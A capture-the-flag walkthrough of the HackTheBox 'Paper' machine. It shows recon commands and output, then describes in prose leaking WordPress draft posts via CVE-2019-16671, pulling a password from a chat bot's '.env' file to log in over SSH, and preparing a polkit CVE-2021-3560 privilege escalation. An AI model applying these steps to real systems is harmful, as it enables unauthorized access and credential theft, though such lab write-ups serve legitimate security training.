HTB-Paper

9 min readMar 24, 2022

Linux based box with the difficulty level easy.

Box overview

This box is based on two CVEs i.e. CVE-2019–16671 & CVE-2021–3560. CVE-2019–16671 could allow an unauthenticated user to view private or draft post due to an issue within WP_Query. This will be our holy grail to gain the initial footholds on the target machine. While CVE-2021–3560 will help us to escalate privileges and become root. This box requires extreme level of enumeration, an idea about the recent vulnerabilities and enough patience to make you stick the with the box. Without any further due, lets dive into the technicalities.

Enumeration

Initiating the nmap scan to find the open ports and running services. Starting our nmap scan i.e. nmap -sC -sV -p- --min-rate 500 10.10.11.143 -oA full-scan

Command explanation:

nmap:            to initiate the command
-sC:             to run the default nmap scripts
-sV:             to get the service version details
-p-:             to scan all ports
--min-rate       to define the number of packets per second
500:             number of packets
10.10.11.143     ip address of machine
-oA              to get output in all format i.e. nmap,gnmap,xml
full-scan        name of the output file

Output of above command:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

Short notes derived from the above result:

22/tcp: Port is open and running OpenSSH 8.0 This version of OpenSSH does not associate with any major vulnerability which can give us remote code execution or at least initial footholds.
80/tcp: Port is open and running Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) This version of Apache is vulnerable to CVE-2019–0215 which is a bug in mod_ssl when using per-location client certificate verification with TLSv1.3 allowed a client supporting Post-Handshake Authentication to bypass configured access control restrictions. Since this may or may not provide a RCE, therefore we will keep this as our last resort.
443/tcp: Port is open and running same service as on port 80.
Some other things to be noted are that the target machine is running on centos and http trace method is enabled.

We didn’t get any juicy information from the above scan. Lets check what is happening on port 80 and port 443.

Port 80 and port 443 are showing the same result as shown above. As mentioned earlier, this box requires a lots of enumeration. Lets try with directory brute forcing and see if it works.

For the same, we will be using gobuster Initiating our gobuster scan i.e. gobuster dir --url http://10.10.11.143/ -w /usr/share/wordlists/dirb/common.txt -t 100

Command explanation:

gobuster:      to initiate the command
dir:           to specify the directory or file  enumeration
--url:         to specify the url
-w:            to specify the wordlist
-t:            to specifyt the number of concurrent threads

Output of above command:

/.hta                 (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/manual               (Status: 301) [Size: 235] [--> http://10.10.11.143/manual/]

On visiting the above directories, we didn’t get anything to proceed with. Lets try some command line tool to find something usable. Using curl to request the same pages i.e. curl --head http://10.10.11.143/

Output of above command:

HTTP/1.1 403 Forbidden
Date: Tue, 22 Mar 2022 10:44:24 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

We got some something interesting at X-Backend-Server: office.paperthis is not a common header and looks fishy. This might be a virtual host too.

Add this virtual host into the /etc/hosts file.

Now visit http://office.paper/ here we go, it looks like a functional website.

After exploring this website, found three users i.e. prisonmike,nick,jan These might be the users of any login page. Noting down these users for future reference if required. After some lateral movements, found a wordpress login page.

Tried the aforementioned users to find if they are valid users. prisonmike is the only valid user. Also tried password bruteforcing but it took too long and no luck :(

Since this is a wordpress site, we can also use wpscan to enumerate vulnerable themes or plugins.

wpscan --url http://office.paper/ -v -t 10 -e vp vt --api-token xxxxxxxxxxxxxxxxxxxxxxxxxx --random-user-agent --force -o wpscan_report

Command explanation:

wpscan:              to initiate the command
--url:               to define the url
-v:                  to enable verbose mode
-t:                  to specify the maximum number of threads
-e:                  to define what to enumerate(vp: vulnerable                  
                     plugins vt: vulnerable themes)
--api-token:         to specify the api-token
--random-user-agent: to use random user agent
--force:             disallow wp check
-o:                  to specify the output file name
wpscan_report:       output file name

From the output of the above command, found that Wordpress 5.2.3 is vulnerable to multiple vulnerabilities. Taking an important part from the scan to proceed with. Find full scan report here.

Unauthenticated View Private/Draft Posts

Finally, we found a reliable vulnerability to proceed with. This is CVE-2019-16671 which could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query. Since we have found that our target is vulnerable to the above vulnerability. No we will go ahead for exploitation.

Exploitation

After some research, found an exploit on exploitdb which states that adding ?static=1 to a wordpress url should leak its secret content. Now we need to visit http://office.paper/?static=1 to see if it works…

Here we found a chat registration link. Before visiting that link, notice there is another virtual host i.e. chat.office.paper We need to add this in our /etc/hosts file.

Now visit the registration link…

NOTE: These are not fixed credentials and you can register with any other information too.


username:    kalki
email:       kalki@office.paper
passwd:      kalki@123

Once we logged in, we will find our self a part of the general group and found something interesting.

After reading the chat, found that dwight is the admin and he made a bot named recyclops to answer his co-workers. We can DM to recyclops for any query. But the communication with recyclops can be made only in certain pattern or way. Lets send hey to recyclops.

It asks to send help to see his true power. Tried sending help and received a long string of how to interact with recyclops That reply can be found here. In short, that is a manual of command which can be used in recyclops DM. Lets try some of those…

We found user.txt , a directory hubot , and other files too. Tried accessing user.txt file…

Not able to read user.txt but we can explore more files and directories.

In hubot directory, found .env file. It contains some juicy information.

Here we got the password for ROCKETCHAT_USER recyclops Since this bot is created by admin dwight therefore it might be his credentials. We can try ssh into target machine using these credentials.

We logged in as user dwight Now we can have some lateral movements to get the user.txt flag.

Now lets move ahead to get the root flag. For privilege escalation, we will be transfering linPEAS script from our local machine to target (or victim) machine.

Now give it an executable permission and run it.

Since linpeas script provides lots of information, therefore we pasted here the important part.

From the above report, the target is vulnerable to CVE-2021–3560. While researching about this vulnerability, I came across this article. This vulnerability states that polkit could be tricked into bypassing the credentials checks for D-Bus requests, elevating the privileges of requestor to the root user. This flaw can be used by a local attacker to create a new local administrator user.

Now, we have two methods of exploitation i.e. manual and automatic. Since this is a timing based attack it will require multiple attempts to add the new user but via automatic method, we can get it done in less number of attempts. Found an existing exploit for the same. Now we need to transfer the exploit code to our target machine.